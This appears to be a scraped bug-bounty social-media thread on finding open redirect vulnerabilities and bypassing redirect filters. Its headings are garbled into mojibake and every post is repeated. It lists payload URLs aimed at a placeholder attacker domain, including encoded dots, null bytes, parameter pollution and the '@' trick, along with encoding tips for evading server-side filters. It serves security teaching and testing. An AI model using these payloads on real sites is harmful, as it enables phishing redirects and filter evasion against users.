10 different techniques to Find and Bypass Open Redirect Vulnerabilities in Web Application.
[A Thread ๐งต]
#bugbounty #bugbountytips #cybersecurity #AppSec
[A Thread ๐งต]
#bugbounty #bugbountytips #cybersecurity #AppSec
[1/n]
๐๐ก๐๐ญ ๐ข๐ฌ ๐๐ง ๐๐ฉ๐๐ง ๐๐๐๐ข๐ซ๐๐๐ญ ๐๐ฎ๐ฅ๐ง๐๐ซ๐๐๐ข๐ฅ๐ข๐ญ๐ฒ?
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way.
๐๐ก๐๐ญ ๐ข๐ฌ ๐๐ง ๐๐ฉ๐๐ง ๐๐๐๐ข๐ซ๐๐๐ญ ๐๐ฎ๐ฅ๐ง๐๐ซ๐๐๐ข๐ฅ๐ข๐ญ๐ฒ?
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way.
[2/n]
๐๐จ๐ฆ๐ฆ๐จ๐ง ๐๐ฅ๐๐๐๐ฌ ๐ญ๐จ ๐๐ข๐ง๐ ๐๐ฉ๐๐ง ๐๐๐๐ซ๐ข๐๐ญ๐ข๐จ๐ง:
login
register
logout
change site language
links in emails
๐๐จ๐ฆ๐ฆ๐จ๐ง ๐๐ฅ๐๐๐๐ฌ ๐ญ๐จ ๐๐ข๐ง๐ ๐๐ฉ๐๐ง ๐๐๐๐ซ๐ข๐๐ญ๐ข๐จ๐ง:
login
register
logout
change site language
links in emails
[3/n]
For the sake of examples Let's assume:
[webapp.nt] is vulnerable app
[attacker.ed] is attacker controlled domain
๐๐๐ฌ๐ข๐ ๐๐๐๐ข๐ซ๐๐๐ญ ๐๐๐ฒ๐ฅ๐จ๐๐๐ฌ
http://webapp.nt?redirect=attacker.ed
This will redirect Users to attacker controlled domain("attacker.ed")
For the sake of examples Let's assume:
[webapp.nt] is vulnerable app
[attacker.ed] is attacker controlled domain
๐๐๐ฌ๐ข๐ ๐๐๐๐ข๐ซ๐๐๐ญ ๐๐๐ฒ๐ฅ๐จ๐๐๐ฌ
http://webapp.nt?redirect=attacker.ed
This will redirect Users to attacker controlled domain("attacker.ed")
[4/n]
๐๐๐ ๐๐๐ฌ๐๐ ๐ซ๐๐๐ข๐ซ๐๐๐ญ๐ข๐จ๐ง:
http://webapp.nt/http://attacker.ed
http://webapp.nt//http://attacker.ed
http://webapp.nt///http://attacker.ed
Blindly Appending attacker controlled URL may sometime lead to Open redirections.
๐๐๐ ๐๐๐ฌ๐๐ ๐ซ๐๐๐ข๐ซ๐๐๐ญ๐ข๐จ๐ง:
http://webapp.nt/http://attacker.ed
http://webapp.nt//http://attacker.ed
http://webapp.nt///http://attacker.ed
Blindly Appending attacker controlled URL may sometime lead to Open redirections.
[5/n]
๐๐ป๐ฐ๐ผ๐ฑ๐ถ๐ป๐ด ๐๐จ๐ญ(.) :
http://webapp.nt?redirect=attacker%E3%80%82ed
- Single URL encoding or . in payload
- Double URL encoding or . in payload
- Triple URL encoding or . in payload
๐๐ป๐ฐ๐ผ๐ฑ๐ถ๐ป๐ด ๐๐จ๐ญ(.) :
http://webapp.nt?redirect=attacker%E3%80%82ed
- Single URL encoding or . in payload
- Double URL encoding or . in payload
- Triple URL encoding or . in payload
[6/n]
๐จ๐๐ถ๐ป๐ด ๐ก๐๐น๐น ๐๐ต๐ฎ๐ฟ:
http://webapp.nt?redirect=//attacker%00.ed
Mixing Nullchars to your payload may allow you to bypass the open redirect filter at the backend.
๐จ๐๐ถ๐ป๐ด ๐ก๐๐น๐น ๐๐ต๐ฎ๐ฟ:
http://webapp.nt?redirect=//attacker%00.ed
Mixing Nullchars to your payload may allow you to bypass the open redirect filter at the backend.
[7/n]
๐๐ญ๐ญ๐ฉ ๐๐๐ซ๐๐ฆ๐๐ญ๐๐ซ ๐๐จ๐ฅ๐ฅ๐ฎ๐ญ๐ข๐จ๐ง:
Passing same parameters twice in the same request may bypass the protection:
http://webapp.nt?redirect=//attacker.ed&redirect=//attacker.ed
or
http://webapp.nt?redirect=webapp.nt&redirect=//attacker.ed
๐๐ญ๐ญ๐ฉ ๐๐๐ซ๐๐ฆ๐๐ญ๐๐ซ ๐๐จ๐ฅ๐ฅ๐ฎ๐ญ๐ข๐จ๐ง:
Passing same parameters twice in the same request may bypass the protection:
http://webapp.nt?redirect=//attacker.ed&redirect=//attacker.ed
or
http://webapp.nt?redirect=webapp.nt&redirect=//attacker.ed
[8/n]
๐๐ฌ๐ข๐ง๐ @ ๐๐ก๐๐ซ๐๐๐ญ๐๐ซ:
If the company is allowing Redirects only to their own site, The following payload can be useful to bypass such protections
http://webapp.nt?redirect=//webapp.nt@attacker.ed
๐๐ฌ๐ข๐ง๐ @ ๐๐ก๐๐ซ๐๐๐ญ๐๐ซ:
If the company is allowing Redirects only to their own site, The following payload can be useful to bypass such protections
http://webapp.nt?redirect=//webapp.nt@attacker.ed
[9/n]
๐จ๐๐ถ๐ป๐ด ๐๐ฃ ๐ฎ๐ฑ๐ฑ๐ฟ๐ฒ๐๐ ๐๐ถ๐๐ต ๐๐ถ๐ณ๐ณ๐ฒ๐ฟ๐ฒ๐ป๐ ๐ก๐ผ๐๐ฎ๐๐ถ๐ผ๐ป๐:
Try redirecting to an IP address (instead of a domain) using different notations: IPv6, IPv4 in decimal, hex or octal
๐จ๐๐ถ๐ป๐ด ๐๐ฃ ๐ฎ๐ฑ๐ฑ๐ฟ๐ฒ๐๐ ๐๐ถ๐๐ต ๐๐ถ๐ณ๐ณ๐ฒ๐ฟ๐ฒ๐ป๐ ๐ก๐ผ๐๐ฎ๐๐ถ๐ผ๐ป๐:
Try redirecting to an IP address (instead of a domain) using different notations: IPv6, IPv4 in decimal, hex or octal
[10/n]
๐๐ป๐ฐ๐ผ๐ฑ๐ถ๐ป๐ด ๐ง๐ฒ๐ฐ๐ต๐ป๐ถ๐พ๐๐ฒ๐:
Use the following encoding techniques to encode your payload if blocked by server-side:
Url Encoded
Double Url Encoded
Hex Encoded
Mixed Encoded
base64 encoded
๐๐ป๐ฐ๐ผ๐ฑ๐ถ๐ป๐ด ๐ง๐ฒ๐ฐ๐ต๐ป๐ถ๐พ๐๐ฒ๐:
Use the following encoding techniques to encode your payload if blocked by server-side:
Url Encoded
Double Url Encoded
Hex Encoded
Mixed Encoded
base64 encoded
[11/n]
๐๐๐๐ ๐ซ๐๐๐ข๐ซ๐๐๐ญ ๐ฌ๐ญ๐๐ญ๐ฎ๐ฌ ๐๐จ๐๐๐ฌ:
Requests with the following Response codes maybe a indication to look for open redirect in such requests
301 Moved Permanently
302 Found
303 See Other
304 Not Modified
305 Use Proxy
307/308 Permanent/Temp Redirect
๐๐๐๐ ๐ซ๐๐๐ข๐ซ๐๐๐ญ ๐ฌ๐ญ๐๐ญ๐ฎ๐ฌ ๐๐จ๐๐๐ฌ:
Requests with the following Response codes maybe a indication to look for open redirect in such requests
301 Moved Permanently
302 Found
303 See Other
304 Not Modified
305 Use Proxy
307/308 Permanent/Temp Redirect
Loading suggestions...